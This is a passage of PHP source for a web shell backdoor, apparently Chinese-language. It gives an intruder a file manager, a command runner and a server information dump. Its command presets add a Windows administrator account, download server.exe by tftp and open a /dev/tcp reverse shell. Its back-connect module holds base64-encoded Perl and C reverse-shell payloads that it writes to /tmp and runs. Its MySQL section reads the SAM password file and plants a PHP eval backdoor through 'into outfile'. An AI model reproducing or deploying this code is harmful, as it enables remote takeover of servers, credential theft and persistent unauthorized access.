value="\'.$files.\'">\');\r\n\t\t\thtml_img(css_showimg($files));\r\n\t\t\thtml_a($Fileurls,$files,\'target="_blank"\');\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n            if(($it==\'.gz\') or ($it==\'zip\') or ($it==\'tar\') or ($it==\'.7z\'))\r\n\t\t\t   html_a(\'?unzip=\'.$filepath,\'ѹ\',\'title="ѹ\'.$files.\'" onClick="rusurechk(\\\'\'.$todir.\'\\\',\\\'?unzip=\'.$filepath.\'&todir=\\\');return false;"\');\r\n\t\t\telse\r\n               html_a(\'?eanver=editr&p=\'.$filepath,\'༭\',\'title="༭\'.$files.\'"\');\r\n\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusurechk(\'$files\',\'?eanver=rename&p=$filepath&newname=\');return false;\\"></a>");\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusuredel(\'$files\',\'?eanver=del&p=$filepath\');return false;\\">ɾ</a> ");\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusurechk(\'".urldecode($filepath)."\',\'?eanver=copy&p=$filepath&newcopy=\');return false;\\"></a>");\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n\t\t\thtml_a(\'?eanver=perm&p=\'.$filepath.\'&chmod=\'.$perm,$perm);\r\n            html_n(\'</td><td align="center">\'.GetFileOwner("$path/$files").\':\'.GetFileGroup("$path/$files"));\r\n\t\t\thtml_n(\'</td><td align="center">\'.$filetime.\'</td><td align="right">\');\r\n\t\t\thtml_a(\'?down=\'.$filepath,$fsize,\'title="\'.$files.\'"\');\r\n\t\t\thtml_n(\'</td></tr>\');\r\n\t\t\t$NUM_F++;\r\n\t\t}\r\n\t}\r\n\t@$dir->close();\r\n\tif(!$Filetime) $Filetime = gmdate(\'Y-m-d H:i:s\',time() + 3600 * 8);\r\nprint<<<END\r\n</table>\r\n<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> \r\n<input type="hidden" id="inver" name="inver" value="undefined"> \r\n<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> \r\n<input type="button" value="" onclick="SubmitUrl(\'ѡļ·: \',\'{$REAL_DIR}\',\'a\');return false;"> \r\n<input type="button" value="ɾ" onclick="Delok(\'ѡļ\',\'b\');return false;"> \r\n<input type="button" value="" onclick="SubmitUrl(\'޸ѡļֵΪ: \',\'0666\',\'c\');return false;"> \r\n<input type="button" value="ʱ" onclick="CheckDate(\'{$Filetime}\',\'d\');return false;"> \r\n<input type="button" value="" onclick="SubmitUrl(\'ѡļΪ: \',\'{$_SERVER[\'SERVER_NAME\']}.tar.gz\',\'e\');return false;">\r\nĿ¼({$NUM_D}) / ļ({$NUM_F})</div> \r\n</form> \r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "editr":\r\nprint<<<END\r\n<script>\r\nEND;\r\nhtml_base();\r\nprint<<<END\r\n\t</script>\r\nEND;\r\n\tcss_js("2");\r\n\tif(!empty($_POST[\'uploadt\'])){\r\n\t\techo @copy($_FILES[\'upfilet\'][\'tmp_name\'],str_path($p.\'/\'.$_FILES[\'upfilet\'][\'name\'])) ? html_a("?eanver=main",$_FILES[\'upfilet\'][\'name\'].\' \'.$msg[2]) : msg($msg[3]);\r\n\t\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.urlencode($p).\'">\');\r\n\t}\r\n\tif(!empty($_GET[\'redir\'])){\r\n        $name=$_GET[\'name\'];\r\n\t\t$newdir = str_path($p.\'/\'.$name);\r\n\t\t@mkdir($newdir,0777) ? html_a("?eanver=main",$name.\' \'.$msg[0]) : msg($msg[1]);\r\n\t\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.urlencode($p).\'">\');\r\n\t}\r\n\r\n\tif(!empty($_GET[\'refile\'])){\r\n        $name=$_GET[\'name\'];\r\n\t\t$jspath=urlencode($p.\'/\'.$name);\r\n\t\t$pp = urlencode($p);\r\n\t\t$p = str_path($p.\'/\'.$name);\r\n\t\t$FILE_CODE = "";\r\n\t\t$charset= \'GB2312\';\r\n        $FILE_TIME =date(\'Y-m-d H:i:s\',time()+3600*8);\r\n\t\tif(@file_exists($p)) echo \'Ŀ¼"ͬ"ļ<br>\';\r\n\t}else{\r\n\t\t$jspath=urlencode($p);\r\n\t\t$FILE_TIME = date(\'Y-m-d H:i:s\',filemtime($p));\r\n        $FILE_CODE=@file_get_contents($p);\r\n\t     if (substr(PHP_VERSION,0,1)>=5){\r\n            if(empty($_GET[\'charset\'])){\r\n\t\t\t   if(TestUtf8($FILE_CODE)>1){$charset= \'UTF-8\';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= \'GB2312\';}\r\n\t\t\t  }else{\r\n\t\t\t   if($_GET[\'charset\']==\'GB2312\'){$charset= \'GB2312\';}else{$charset= $_GET[\'charset\'];$FILE_CODE = iconv($_GET[\'charset\'],"gb2312//IGNORE",$FILE_CODE);}\r\n\t\t\t  }\r\n\t\t  }\r\n        $FILE_CODE = htmlspecialchars($FILE_CODE);\r\n\t}\r\nprint<<<END\r\n<div class="actall">: <input name="searchs" type="text" value="{$dim}" style="width:500px;">\r\n<input type="button" value="" onclick="search(searchs.value)"></div>\r\n<form method=\'POST\' id="editor"  action=\'?eanver=main&path={$pp}\'>\r\n<div class="actall">\r\n<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;">ָ룺<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location=\'?eanver=editr&p={$jspath}&charset=\'+this.value;">\r\n<input type="button" value="ѡ" onclick="window.location=\'?eanver=editr&p={$jspath}&charset=\'+this.form.charset.value;" style="width:50px;"> \r\nEND;\r\nhtml_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\\"window.location=\'?eanver=editr&p={$jspath}&charset=\'+options[selectedIndex].value;\\"");\r\nprint<<<END\r\n</div>\r\n<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>\r\n<div class="actall">ļ޸ʱ <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>Զʽļ(ʹ)</div>\r\n<div class="actall"><input type="button" value="" onclick="CheckDate();" style="width:80px;"><input name=\'reset\' type=\'reset\' value=\'\'> \r\n<input type="button" value="" onclick="window.location=\'?eanver=main&path={$pp}\';" style="width:80px;"></div>\r\n</form>\r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "rename":\r\n\thtml_n("<tr><td>");\r\n\t$newname = urldecode($pp).\'/\'.urlencode($_GET[\'newname\']);\r\n\t@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET[\'newname\']).\' \'.$msg[4]) : msg($msg[5]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "deltree":\r\n\thtml_n("<tr><td>");\r\n\tdo_deltree($p) ? html_a("?eanver=main&path=$pp",$p.\' \'.$msg[6]) : msg($msg[7]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "del":\r\n\thtml_n("<tr><td>");\r\n\t@unlink($p) ? html_a("?eanver=main&path=$pp",$p.\' \'.$msg[6]) : msg($msg[7]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "copy":\r\n\thtml_n("<tr><td>");\r\n\t$newpath = explode(\'/\',$_GET[\'newcopy\']);\r\n\t$pathr[0] = $newpath[0];\r\n\tfor($i=1;$i < count($newpath);$i++){\r\n\t\t$pathr[] = urlencode($newpath[$i]);\r\n\t}\r\n\t$newcopy = implode(\'/\',$pathr);\r\n\t@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.\' \'.$msg[4]) : msg($msg[5]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "perm":\r\n\thtml_n("<form method=\'POST\'><tr><td>".$p.\' Ϊ: \');\r\n\tif(is_dir($p)){\r\n\t\thtml_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET[\'chmod\']);\r\n\t}else{\r\n\t\thtml_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET[\'chmod\']);\r\n\t}\r\n\thtml_input("submit","save","޸");\r\n\tback();\r\n\tif($_POST[\'class\']){\r\n\t\tswitch($_POST[\'class\']){\r\n\t\t\tcase "0777": $change = @chmod($p,0777); break;\r\n\t\t\tcase "0755": $change = @chmod($p,0755); break;\r\n\t\t\tcase "0555": $change = @chmod($p,0555); break;\r\n\t\t\tcase "0666": $change = @chmod($p,0666); break;\r\n\t\t\tcase "0644": $change = @chmod($p,0644); break;\r\n\t\t\tcase "0444": $change = @chmod($p,0444); break;\r\n\t\t}\r\n\t\t$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);\r\n\t\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\t}\r\n\thtml_n("</td></tr></form>");\r\n\tbreak;\r\n\r\n    case "info_f":\r\n\t$dis_func = get_cfg_var("disable_functions");\r\n\t$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ";\r\n\t$adminmail = (isset($_SERVER[\'SERVER_ADMIN\'])) ? "<a href=\\"mailto:".$_SERVER[\'SERVER_ADMIN\']."\\">".$_SERVER[\'SERVER_ADMIN\']."</a>" : "<a href=\\"mailto:".get_cfg_var("sendmail_from")."\\">".get_cfg_var("sendmail_from")."</a>";\r\n\tif($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}\r\n\t$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";\r\n\t$info = array(\r\n\t\tarray("ʱ",date("Ymd h:i:s",time())),\r\n\t\tarray("","<a href=\\"http://".$_SERVER[\'SERVER_NAME\']."\\" target=\\"_blank\\">".$_SERVER[\'SERVER_NAME\']."</a>"),\r\n\t\tarray("IPַ",gethostbyname($_SERVER[\'SERVER_NAME\'])),\r\n\t\tarray("ϵͳ",PHP_OS),\r\n\t\tarray("ϵͳֱ",$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']),\r\n\t\tarray("",$_SERVER[\'SERVER_SOFTWARE\']),\r\n\t\tarray("IP",$_SERVER["REMOTE_ADDR"]),\r\n\t\tarray("Web˿",$_SERVER[\'SERVER_PORT\']),\r\n\t\tarray("PHPзʽ",strtoupper(php_sapi_name())),\r\n\t\tarray("PHP汾",PHP_VERSION),\r\n\t\tarray("ڰȫģʽ",Info_Cfg("safemode")),\r\n\t\tarray("Ա",$adminmail),\r\n\t\tarray("ļ·",myaddress),\r\n\t\tarray("ʹ URL ļ allow_url_fopen",Info_Cfg("allow_url_fopen")),\r\n\t\tarray("ʹcurl_exec",Info_Fun("curl_exec")),\r\n\t\tarray("̬ӿ enable_dl",Info_Cfg("enable_dl")),\r\n\t\tarray("ʾϢ display_errors",Info_Cfg("display_errors")),\r\n\t\tarray("Զȫֱ register_globals",Info_Cfg("register_globals")),\r\n\t\tarray("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),\r\n\t\tarray("ʹڴ memory_limit",Info_Cfg("memory_limit")),\r\n\t\tarray("POSTֽ post_max_size",Info_Cfg("post_max_size")),\r\n\t\tarray("ϴļ upload_max_filesize",$upsize),\r\n\t\tarray("ʱ max_execution_time",Info_Cfg("max_execution_time").""),\r\n\t\tarray("õĺ disable_functions",$dis_func),\r\n\t\tarray("phpinfo()",$phpinfo),\r\n\t\tarray("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).\'Mb\'),\r\n\t\tarray("ͼδ GD Library",Info_Fun("imageline")),\r\n\t\tarray("IMAPʼϵͳ",Info_Fun("imap_close")),\r\n\t\tarray("MySQLݿ",Info_Fun("mysql_close")),\r\n\t\tarray("SyBaseݿ",Info_Fun("sybase_close")),\r\n\t\tarray("Oracleݿ",Info_Fun("ora_close")),\r\n\t\tarray("Oracle 8 ݿ",Info_Fun("OCILogOff")),\r\n\t\tarray("PREL﷨ PCRE",Info_Fun("preg_match")),\r\n\t\tarray("PDFĵ֧",Info_Fun("pdf_close")),\r\n\t\tarray("Postgre SQLݿ",Info_Fun("pg_close")),\r\n\t\tarray("SNMPЭ",Info_Fun("snmpget")),\r\n\t\tarray("ѹļ֧(Zlib)",Info_Fun("gzclose")),\r\n\t\tarray("XML",Info_Fun("xml_set_object")),\r\n\t\tarray("FTP",Info_Fun("ftp_login")),\r\n\t\tarray("ODBCݿ",Info_Fun("odbc_close")),\r\n\t\tarray("Session֧",Info_Fun("session_start")),\r\n\t\tarray("Socket֧",Info_Fun("fsockopen")),\r\n\t);\r\n\t$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");\r\n\techo \'<table width="100%" border="0">\';\r\n\tfor($i = 0;$i < count($info);$i++){echo \'<tr><td width="40%">\'.$info[$i][0].\'</td><td>\'.$info[$i][1].\'</td></tr>\'."\\n";}\r\ntry{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\Tds\\\\tcp\\PortNumber");\r\n$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0\\\\TelnetPort");\r\n$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Symantec\\\\pcAnywhere\\\\CurrentVersion\\\\System\\\\TCPIPDataPort");\r\n}catch(Exception $e){}\r\n    echo \'<tr><td width="40%">Terminal Service˿Ϊ</td><td>\'.$registry_proxystring.\'</td></tr>\'."\\n";\r\n\techo \'<tr><td width="40%">Telnet˿Ϊ</td><td>\'.$Telnet.\'</td></tr>\'."\\n";\r\n\techo \'<tr><td width="40%">PcAnywhere˿Ϊ</td><td>\'.$PcAnywhere.\'</td></tr>\'."\\n";\r\n\techo \'</table>\';\r\n\tbreak;\r\n\r\n\r\n    case "cmd":\r\n\t$res = \'Դ\';\r\n\t$cmd = \'dir\';\r\n\tif(!empty($_POST[\'cmd\'])){$res = Exec_Run(base64_decode($_POST[\'cmd\']));$cmd = htmlspecialchars(base64_decode($_POST[\'cmd\']));}\r\n\r\nprint<<<END\r\n<script language="javascript">\r\nfunction sFull(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "dir";\r\n\tStr[1] = "net user envl envl /add";\r\n\tStr[2] = "net localgroup administrators envl /add";\r\n\tStr[3] = "netstat -ano";\r\n\tStr[4] = "ipconfig";\r\n\tStr[5] = "copy c:\\\\1.php d:\\\\2.php";\r\n\tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\\\server.exe";\r\n\tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";\r\n\tStr[8] = "tasklist -svc";\r\n\tdocument.getElementById(\'cmd\').value = Str[i];\r\n\treturn true;\r\n}\r\nEND;\r\nhtml_base();\r\nprint<<<END\r\nfunction SubmitUrl(){\r\n\t\t\tdocument.getElementById(\'cmd\').value = base64encode(document.getElementById(\'cmd\').value);\r\n\t\t\tdocument.getElementById(\'gform\').submit();\r\n}\r\n</script>\r\n<form method="POST" name="gform" id="gform" ><center><div class="actall">ִܶغִвˣ˷ûκιִʹBASE64ύֹСϸڣɾͣ</div><div class="actall">\r\n <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">\r\n\r\n\t<input type="button" value="ִ" onclick="SubmitUrl();" style="width:80px;">\r\n</div>\r\n<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>\r\n</form>\r\nEND;\r\n\tbreak;\r\n\r\n\r\n\r\ncase "linux":\r\n\r\n\t$yourip = $_COOKIE[\'yourip\'] ? $_COOKIE[\'yourip\'] : getenv(\'REMOTE_ADDR\');\r\n\t$yourport = $_COOKIE[\'yourport\'] ? $_COOKIE[\'yourport\'] : \'12388\';\r\n\r\n\t$system=strtoupper(substr(PHP_OS, 0, 3));\r\nprint<<<END\r\n<div class="actall">ʹ÷<br>\r\n\t\t\tԼ"nc -vv -l 12388"<br>\r\n\t\t\tȻڴдԵIP,ӣ˷ȫʵãNC</div>\r\n<form method="POST" name="kform" id="kform">\r\n<div class="actall">ĵַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>\r\n<div class="actall">Ӷ˿ <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div>\r\n<div class="actall">ִзʽ <select name="use" >\r\n<option value="perl">Perl</option>\r\n<option value="c">C</option>\r\n<option value="php">PHP</option>\r\n<option value="nc">NC</option>\r\n</select></div>\r\n<div class="actall"><input type="submit" value="ʼ" style="width:80px;"></div></form>\r\nEND;\r\n\tif((!empty($_POST[\'yourip\'])) && (!empty($_POST[\'yourport\'])))\r\n\t{\r\n    setcookie(\'yourip\',$backip);\r\n\tsetcookie(\'yourport\',$backport);\r\n\t\r\n\t\techo \'<div class="actall">\';\r\n\t\tif($_POST[\'use\'] == \'perl\')\r\n\t\t{\r\n\t\t\t$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".\r\n\t\t\t"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".\r\n\t\t\t"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".\r\n\t\t\t"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".\r\n\t\t\t"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".\r\n\t\t\t"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".\r\n\t\t\t"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";\r\n\t\t\techo File_Write(\'/tmp/envl_bc\',base64_decode($back_connect_pl),\'wb\') ? \'/tmp/envl_bcɹ<br>\' : \'/tmp/envl_bcʧ<br>\';\r\n\t\t\t$perlpath = Exec_Run(\'which perl\');\r\n\t\t\t$perlpath = $perlpath ? chop($perlpath) : \'perl\';\r\n\t\t\t@unlink(\'/tmp/envl_bc.c\');\r\n\t\t\techo Exec_Run($perlpath.\' /tmp/envl_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -vv -l \'.$_POST[\'yourport\'] : \'ִʧ\';\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'c\')\r\n\t\t{\r\n\t\t\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".\r\n\t\t\t"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".\r\n\t\t\t"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".\r\n\t\t\t"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".\r\n\t\t\t"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".\r\n\t\t\t"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".\r\n\t\t\t"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".\r\n\t\t\t"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";\r\n\t\t\techo File_Write(\'/tmp/envl_bc.c\',base64_decode($back_connect_c),\'wb\') ? \'/tmp/envl_bc.cɹ<br>\' : \'/tmp/envl_bc.cʧ<br>\';\r\n\t\t\t$res = Exec_Run(\'gcc -o /tmp/envl_bc /tmp/envl_bc.c\');\r\n\t\t\t@unlink(\'/tmp/envl_bc.c\');\r\n\t\t\techo Exec_Run(\'/tmp/envl_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -vv -l \'.$_POST[\'yourport\'] : \'ִʧ\';\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'php\')\r\n\t\t{\r\n\t\tif(!extension_loaded(\'sockets\'))\r\n           {\r\n\t        if ($system == \'WIN\') {\r\n\t\t        @dl(\'php_sockets.dll\') or die("Can\'t load socket");\r\n\t        }else{\r\n\t    \t    @dl(\'sockets.so\') or die("Can\'t load socket");\r\n\t        }\r\n           }\r\n\t\t   if($system=="WIN")\r\n           {\r\n         \t$env=array(\'path\' => \'c:\\\\windows\\\\system32\');\r\n            }else{\r\n\t        $env = array(\'PATH\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\r\n           }\r\n           $descriptorspec = array(\r\n         \t0 => array("pipe","r"),\r\n\t        1 => array("pipe","w"),\r\n\t        2 => array("pipe","w"),\r\n           );\r\n\t\t   $host = $_POST[\'yourip\'];\r\n       \t   $port = $_POST[\'yourport\'];\r\n           $host=gethostbyname($host);\r\n           $proto=getprotobyname("tcp");\r\n           if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){\r\n             die("Socketʧ");\r\n           }\r\n           if(($ret=socket_connect($sock,$host,$port))<0){\r\n             die("ʧ");\r\n           }else{\r\n             $message="----------------------PHP--------------------\\n";\r\n             socket_write($sock,$message,strlen($message));\r\n             $cwd=str_replace(\'\\\\\',\'/\',dirname(__FILE__));\r\n             while($cmd=socket_read($sock,65535,$proto)){\r\n                if(trim(strtolower($cmd))=="exit"){\r\n                   socket_write($sock,"Bye\\n");\r\n                   exit;\r\n                }else{\r\n                   $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);\r\n                   if (is_resource($process)) {\r\n\t                fwrite($pipes[0], $cmd);\r\n\t                fclose($pipes[0]);\r\n\t                $msg=stream_get_contents($pipes[1]);\r\n\t                socket_write($sock,$msg,strlen($msg));\r\n\t                fclose($pipes[1]);\r\n\t                $msg=stream_get_contents($pipes[2]);\r\n\t                socket_write($sock,$msg,strlen($msg));\r\n\t                $return_value = proc_close($process);\r\n                   }\r\n                }\r\n\t\t   }\r\n\t\t  }\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'nc\')\r\n\t\t{\r\n\t     echo \'<div class="actall">\';\r\n\t\t $mip=$_POST[\'yourip\'];\r\n\t\t $bport=$_POST[\'yourport\'];\r\n\t\t $fp=fsockopen($mip , $bport , $errno, $errstr);\r\n\t\t if (!$fp){\r\n\t\t     $result = "Error: could not open socket connection";\r\n\t\t    }else {\r\n\t\t fputs ($fp ,"\\n*********************************************\\n \r\n\t\t              hacking url:http://www.google.com is ok!        \r\n\t\t\t          \\n*********************************************\\n\\n");\r\n\t     while(!feof($fp)){ \r\n         fputs ($fp," [r00t@H4c3ing:/root]# ");\r\n         $result= fgets ($fp, 4096);\r\n         $message=`$result`;\r\n         fputs ($fp,"--> ".$message."\\n");\r\n                          }\r\n         fclose ($fp);\r\n\t\t       }\r\n         echo \'</div>\';\r\n\t\t}\r\n\r\n\t\techo \'<br>ԳӶ˿ (nc -vv -l \'.$_POST[\'yourport\'].\') \';\r\n\t}\r\nbreak;\r\n\r\n\tcase "sqlshell":\r\n\t$MSG_BOX = \'\';\r\n\t$mhost = \'localhost\'; $muser = \'root\'; $mport = \'3306\'; $mpass = \'\'; $mdata = \'mysql\'; $msql = \'select version();\';\r\n\tif(isset($_POST[\'mhost\']) && isset($_POST[\'muser\']))\r\n\t{\r\n\t\t$mhost = $_POST[\'mhost\']; $muser = $_POST[\'muser\']; $mpass = $_POST[\'mpass\']; $mdata = $_POST[\'mdata\']; $mport = $_POST[\'mport\'];\r\n\t\tif($conn = mysql_connect($mhost.\':\'.$mport,$muser,$mpass)) @mysql_select_db($mdata);\r\n\t\telse $MSG_BOX = \'MYSQLʧ\';\r\n\t}\r\n\t$downfile = \'c:/windows/repair/sam\';\r\n\tif(!empty($_POST[\'downfile\']))\r\n\t{\r\n\t\t$downfile = File_Str($_POST[\'downfile\']);\r\n\t\t$binpath = bin2hex($downfile);\r\n\t\t$query = \'select load_file(0x\'.$binpath.\')\';\r\n\t\tif($result = @mysql_query($query,$conn))\r\n\t\t{\r\n\t\t\t$k = 0; $downcode = \'\';\r\n\t\t\twhile($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}\r\n\t\t\t$filedown = basename($downfile);\r\n\t\t\tif(!$filedown) $filedown = \'envl.tmp\';\r\n\t\t\t$array = explode(\'.\', $filedown);\r\n\t\t\t$arrayend = array_pop($array);\r\n\t\t\theader(\'Content-type: application/x-\'.$arrayend);\r\n\t\t\theader(\'Content-Disposition: attachment; filename=\'.$filedown);\r\n\t\t\theader(\'Content-Length: \'.strlen($downcode));\r\n\t\t\techo $downcode;\r\n\t\t\texit;\r\n\t\t}\r\n\t\telse $MSG_BOX = \'ļʧ\';\r\n\t}\r\n\t$o = isset($_GET[\'o\']) ? $_GET[\'o\'] : \'\';\r\nprint<<<END\r\n<script language="javascript">\r\nfunction nFull(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "select version();";\r\n\tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile \'D:/web/iis.txt\'";\r\n\tStr[2] = "select \'<?php eval(\\$_POST[cmd]);?>\' into outfile \'F:/web/bak.php\';";\r\n\tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO \'root\'@\'%\' IDENTIFIED BY \'123456\' WITH GRANT OPTION;";\r\n\tnform.msql.value = Str[i];\r\n\treturn true;\r\n}\r\nEND;\r\nhtml_base();\r\nprint<<<END\r\nfunction SubmitUrl(){\r\n\t\t\tdocument.getElementById(\'msql\').value = base64encode(document.getElementById(\'msql\').value);\r\n\t\t\tdocument.getElementById(\'nform\').submit();\r\n}\r\n</script>\r\n<form method="POST" name="nform" id="nform">\r\n<center><div class="actall"><a href="?eanver=sqlshell">[MYSQLִ]</a> \r\n<a href="?eanver=sqlshell&o=u">[MYSQLϴļ]</a> \r\n<a href="?eanver=sqlshell&o=d">[MYSQLļ]</a></div>\r\n<div class="actall">\r\nַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">\r\n˿ <input type="text" name="mport" value="{$mport}" style="width:110px">\r\nû <input type="text" name="muser" value="{$muser}" style="width:110px">\r\n <input type="text" name="mpass" value="{$mpass}" style="width:110px">\r\n <input type="text" name="mdata" value="{$mdata}" style="width:110px">\r\n</div>\r\n<div class="actall" style="height:220px;">\r\nEND;\r\nif($o == \'u\')\r\n{\r\n\t$uppath = \'C:/Documents and Settings/All Users/ʼ˵///exp.vbs\';\r\n\tif(!empty($_POST[\'uppath\']))\r\n\t{\r\n\t\t$uppath = $_POST[\'uppath\'];\r\n\t\t$query = \'Create TABLE a (cmd text NOT NULL);\';\r\n\t\tif(@mysql_query($query,$conn))\r\n\t\t{\r\n\t\t\tif($tmpcode = File_Read($_FILES[\'upfile\'][\'tmp_name\'])){$filecode = bin2hex(File_Read($tmpcode));}\r\n\t\t\telse{$tmp = File_Str(dirname(myaddress)).\'/upfile.tmp\';if(File_Up($_FILES[\'upfile\'][\'tmp_name\'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}\r\n\t\t\t$query = \'Insert INTO a (cmd) 